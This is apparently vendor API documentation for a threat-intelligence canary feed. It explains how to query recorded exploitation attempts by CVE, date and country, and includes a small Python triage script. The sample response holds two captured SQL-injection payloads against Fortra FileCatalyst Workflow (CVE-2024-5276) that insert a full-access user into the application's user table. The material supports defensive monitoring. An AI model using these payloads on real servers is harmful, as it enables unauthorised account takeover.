Accessing Canary Data

VulnCheck Canary Intelligence provides exploitation data from globally deployed vulnerable hosts, revealing the first signs of vulnerability exploitation and tracking which CVEs are being targeted in the wild, and by whom.

VulnCheck Canary Intelligence deploys actual vulnerable systems across the Internet, capturing real-world attacker behaviors and exploitation techniques in the wild. The data reveals which vulnerabilities are being targeted, how they’re being exploited, and by whom, providing defenders with early and actionable intelligence.

Example Canary Record

The VulnCheck API makes it easy to get started with VulnCheck Canary Intelligence. To start, simply query the vulncheck-canaries index via the /v3/index/:index?cve=:cve API as follows:

curl --request GET \
    --url 'https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276' \
    --header 'Accept: application/json' \
    --header 'Authorization: Bearer insert_token_here'

The above example searches the vulncheck-canaries index for information on CVE-2024-5276.

Example API Response for vulncheck-canaries by CVE

After calling the /v3/index/vulncheck-canaries?cve=:cve API endpoint with a valid CVE identifier, a response similar to the below will be returned:

{
  "_benchmark": 0.039542,
  "_meta": {
    "timestamp": "2025-10-22T11:35:36.982964726Z",
    "index": "vulncheck-canaries",
    // ...
  },
  "data": [
    {
      "src_ip": "34.133.225.171",
      "src_port": 58376,
      "src_country": "US",
      "dst_country": "BR",
      "cve": "CVE-2024-5276",
      "signature_id": 12700349,
      "signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
      "category": "Web Application Attack",
      "severity": 1,
      "http": {
        "url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734cm3xr2dqiauaium96hrrzwmbd%27%2C+NULL%2C+%27986347D9E41AEE0835C341ED7DCA8B65%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdFirstName%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734cm3xr2dqiauaium96hrrzwmbd%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
        "http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
        "protocol": "HTTP/1.1"
      },
      "timestamp": "2025-10-17T18:32:24.338Z"
    },
    {
      "src_ip": "34.16.7.161",
      "src_port": 48334,
      "src_country": "US",
      "dst_country": "BR",
      "cve": "CVE-2024-5276",
      "signature_id": 12700349,
      "signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
      "category": "Web Application Attack",
      "severity": 1,
      "http": {
        "url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734ckkpr2kyqyslshjzytmsobunu%27%2C+NULL%2C+%277CE0027ED69C7ECA40D38289F18C6036%27%2C+%2734ckkpr2kyqyslshjzytmsobunuFirstName%27%2C+%2734ckkpr2kyqyslshjzytmsobunuLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734ckkpr2kyqyslshjzytmsobunu%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
        "http_user_agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
        "protocol": "HTTP/1.1"
      },
      "timestamp": "2025-10-17T18:17:55.908Z"
    }
  ]
}
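For triage, a response like this is easier to act on once it is grouped by source IP, with the targeted path and parameter names pulled out of the URL. The following is an added example, not VulnCheck code: `summarize_hits` and `parse_ts` are hypothetical names, `SAMPLE` is constructed data shaped like the response above, and the handling of records without an `http` object is an assumption.

```python
import json
from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed sample shaped like the response above: documentation-range IPs,
# placeholder user agents and a shortened URL. Not real canary data.
SAMPLE = json.loads("""
{"data": [
  {"src_ip": "203.0.113.10", "cve": "CVE-2024-5276", "signature_id": 12700349,
   "http": {"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3B--+-",
            "http_user_agent": "example-agent-a"},
   "timestamp": "2025-10-17T18:32:24.338Z"},
  {"src_ip": "203.0.113.10", "cve": "CVE-2024-5276", "signature_id": 12700349,
   "http": {"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3B--+-",
            "http_user_agent": "example-agent-b"},
   "timestamp": "2025-10-17T18:17:55.908Z"},
  {"src_ip": "198.51.100.7", "cve": "CVE-2024-5276", "signature_id": 12700349,
   "timestamp": "2025-10-17T19:00:00.000Z"}
]}
""")

def parse_ts(value):
    """Parse the record timestamp format shown above into an aware datetime."""
    parsed = datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ")
    return parsed.replace(tzinfo=timezone.utc)

def summarize_hits(response):
    """Group canary records by source IP: hit count, time window, targets."""
    hits = defaultdict(lambda: {"count": 0, "first_seen": None, "last_seen": None,
                                "paths": set(), "params": set(), "agents": set()})
    for rec in response.get("data", []):
        if not rec.get("src_ip") or not rec.get("timestamp"):
            continue  # skip records missing the fields we key on
        entry, seen = hits[rec["src_ip"]], parse_ts(rec["timestamp"])
        entry["count"] += 1
        entry["first_seen"] = min(entry["first_seen"] or seen, seen)
        entry["last_seen"] = max(entry["last_seen"] or seen, seen)
        http = rec.get("http") or {}  # assumption: may be absent on a record
        url = urlsplit(http.get("url", ""))
        if url.path:
            entry["paths"].add(url.path)
        # parse_qs percent-decodes; only the parameter names are kept here.
        entry["params"].update(parse_qs(url.query, keep_blank_values=True))
        if http.get("http_user_agent"):
            entry["agents"].add(http["http_user_agent"])
    return dict(hits)
```

The resulting paths and parameter names can be matched against your own web server logs to check whether the same sources have touched the same endpoint.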

Example API Queries

VulnCheck Canary Intelligence supports a wide range of use cases.

A CVE Being Exploited on a Specific Date

By combining two of the API query parameters (CVE and Date), we can quickly zoom in on a CVE being exploited on a specific date.

curl --request GET \
    --url 'https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276&date=2025-10-17' \
    --header 'Accept: application/json' \
    --header 'Authorization: Bearer insert_token_here'

API Query Parameters

VulnCheck Canary Intelligence makes it easy to query our canary data set with a number of API query parameters, useful for filtering the results. Supported API query parameters are as follows:

Query Parameter    Description
cve                Filter based on CVE ID
src_country        Filter based on the attacks originating from a source country
dst_country        Filter based on the attacks on the destination country

Offline Backups Available

Offline Backup            Description
vulncheck-canaries-3d     Canary Intelligence detections for the past 3 days
vulncheck-canaries-10d    Canary Intelligence detections for the past 10 days
vulncheck-canaries-30d    Canary Intelligence detections for the past 30 days
vulncheck-canaries-90d    Canary Intelligence detections for the past 90 days

To request a specific offline backup, simply call /v3/backup/:index as follows (vulncheck-canaries-3d shown below):

curl --request GET \
    --url https://api.vulncheck.com/v3/backup/vulncheck-canaries-3d \
    --header 'Accept: application/json' \
    --header 'Authorization: Bearer insert_token_here'